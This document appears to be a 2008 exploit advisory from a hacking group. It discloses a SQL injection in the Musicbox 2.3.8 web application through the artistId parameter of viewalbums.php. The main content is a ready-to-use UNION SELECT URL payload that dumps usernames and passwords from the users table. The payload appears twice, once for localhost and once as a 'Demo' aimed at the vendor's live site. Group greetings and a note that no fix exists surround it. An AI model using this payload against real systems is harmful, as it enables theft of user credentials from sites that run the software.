Musicbox 2.3.8 (viewalbums.php artistId) SQL Injection Vulnerability

2008-11-18 19:50:04

==================================================================================================================
SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM
S N N N A A K K E S T E A A M M M M
SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M
S N N N A A K K E S T E A A M M M
SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M
===================================================SNAKES TEAM====================================================

Script: Musicbox Version 2.3.8 Remote SQL Injection Vulnerability

==============================================:::ALGERIAN HaCkEr:::===============================================
= = = =
= = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = =
= =
= = ************ ::::::home : www.snakespc.com/sc::::::*************** = =
= =
= = :::::Mail: [email protected]::::::: = =
= =
= Sript Demo:http://www.musicboxv2.com/services/demo.php =
= www.musicboxv2.com =
=================================== Snakespc ======================================


Exploit:

http://www.localhost/version2.3.8/viewalbums.php?artistId=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--

Demo :

http://www.musicboxv2.com/version2.3.8/viewalbums.php?artistId=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--

===================================================================================================================
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::
ALL www.Snakespc.com/SC >>>> Members
str0ke.....>>>>.....milw0rm
===================================================================================================================

#

Fixes

No fixes

In order to submit a new fix you need to be registered.